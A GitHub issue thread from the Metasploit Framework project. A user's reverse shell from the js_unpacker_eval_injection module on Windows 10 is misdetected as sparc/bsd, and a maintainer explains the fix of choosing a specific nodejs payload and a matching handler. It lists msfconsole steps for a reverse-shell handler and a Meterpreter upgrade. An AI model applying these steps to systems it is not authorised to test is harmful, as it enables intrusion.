Metasploit-framework: Windows shell detected as shell sparc/bsd

Created on 26 Aug 2020  路  11Comments  路  Source: rapid7/metasploit-framework

Steps to reproduce

How'd you do it?

  1. use exploit/multi/fileformat/js_unpacker_eval_injection
  2. Setting up with my ip and default port and generic/shell_reverse_tcp payload
    3.use multi/handler
    4.setting up with my ip and default port and generic/shell_reverse_tcp payload
    5.exploit -j
    6.and execute the node js script in my windows 10 x64
    7.and i type "sessions" and it output is like this :
    msf5 exploit(multi/handler) > sessions

Active sessions

Id Name Type Information
Connection
-- ---- ---- -----------
----------
1 shell sparc/bsd Microsoft Windows [Version 10.0.18363.1016] (c) 2019 Microsoft Corporation. A... 192.168.0.8:4444 -> 192.168.0.6:55129 (192.168.0.6)
8.and then i type "sessions -u 1" and the output is like this :
msf5 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[-] Shells on the target platform, bsd, cannot be upgraded to Meterpreter at this time.

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.
windows 10 x64 version 10.0.18363 build 18363

Were you following a specific guide/tutorial or reading documentation?

If yes link the guide/tutorial or documentation you were following here, otherwise you may omit this section.

Expected behavior

sessions detect it as "win" and shell_to_meterpreter module run perfectly without any error

Current behavior

What happens instead?
shell_to_meterpreter module failed and sessions output say it is a bsd not a win

You might also want to check the last ~1k lines of
/opt/metasploit/apps/pro/engine/config/logs/framework.log or
~/.msf4/logs/framework.log for relevant stack traces

System stuff

Metasploit version

Get this with the version command in msfconsole (or git log -1 --pretty=oneline for a source install).
metasploit v5.0.101-dev

I installed Metasploit with:

  • [yes ] Kali package via apt
  • [ ] Omnibus installer (nightly)
  • [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
  • [ ] Source install (please specify ruby version)

OS

What OS are you running Metasploit on?
Kali Linux RPI 3B
Linux GetRektBoy724 4.19.118-Re4son-v8+ #1 SMP PREEMPT Wed May 6 12:44:21 UTC 2020 aarch64 GNU/Linux

bug
Source
picture GetRektBoy724

All 11 comments

PLEASE HELP MEEEEEE........ANY HELP IS APPRECIATED

GetRektBoy724 picture GetRektBoy724 on 26 Aug 2020
😕2

Try again with setg LogLevel 3 and showing the last page of ~/.msf4/framework.log.

wvu-r7 picture wvu-r7 on 27 Aug 2020

ok thx
i'll try it

GetRektBoy724 picture GetRektBoy724 on 27 Aug 2020

this is my framework.log
https://pastebin.com/raw/tYC6ErDy
i already type "setg LogLevel 3"

GetRektBoy724 picture GetRektBoy724 on 27 Aug 2020
👍1 
[08/27/2020 07:37:26] [d(2)] core: Selected payload bsd/sparc/shell_reverse_tcp from generic payload generic/shell_reverse_tcp

As I figured... Try setting PAYLOAD to a specific payload, not generic/shell_reverse_tcp. generic/shell_reverse_tcp will autoselect an appropriate payload, and it often guesses wrong.

wvu-r7 picture wvu-r7 on 27 Aug 2020 
msf6 exploit(multi/fileformat/js_unpacker_eval_injection) > show payloads

Compatible Payloads
===================

   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  generic/custom                                    manual  No     Custom Payload
   1  generic/shell_bind_tcp                            manual  No     Generic Command Shell, Bind TCP Inline
   2  generic/shell_reverse_tcp                         manual  No     Generic Command Shell, Reverse TCP Inline
   3  multi/meterpreter/reverse_http                    manual  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures)
   4  multi/meterpreter/reverse_https                   manual  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Mulitple Architectures)
   5  nodejs/shell_bind_tcp                             manual  No     Command Shell, Bind TCP (via nodejs)
   6  nodejs/shell_reverse_tcp                          manual  No     Command Shell, Reverse TCP (via nodejs)
   7  nodejs/shell_reverse_tcp_ssl                      manual  No     Command Shell, Reverse TCP SSL (via nodejs)

msf6 exploit(multi/fileformat/js_unpacker_eval_injection) >

nodejs/shell_reverse_tcp seems to be what you want.

wvu-r7 picture wvu-r7 on 27 Aug 2020

ohh ok thx
i'll try that

GetRektBoy724 picture GetRektBoy724 on 27 Aug 2020

Can nodejs shell be changed to meterpreter?

GetRektBoy724 picture GetRektBoy724 on 27 Aug 2020

YEAH BOIIII I GET METERPRETER!!!!!
So In the nodejs payload i still set it as generic/shell_reverse_tcp
but in the handler i set it as windows/shell_reverse_tcp
and i run shell_to_meterpreter and i get it yayy

GetRektBoy724 picture GetRektBoy724 on 27 Aug 2020

THX FOR YOUR ADVICE @wvu-r7

GetRektBoy724 picture GetRektBoy724 on 27 Aug 2020

Payload and handler should match if possible. Sounds like you got it either way. Enjoy! :+1:

wvu-r7 picture wvu-r7 on 27 Aug 2020
😄1
Was this page helpful?
0 / 5 - 0 ratings

Related issues

XSecr3t picture XSecr3t  路  3Comments
felipee07 picture felipee07  路  3Comments
wvu-r7 picture wvu-r7  路  3Comments
0x27 picture 0x27  路  3Comments
handsomebeast picture handsomebeast  路  3Comments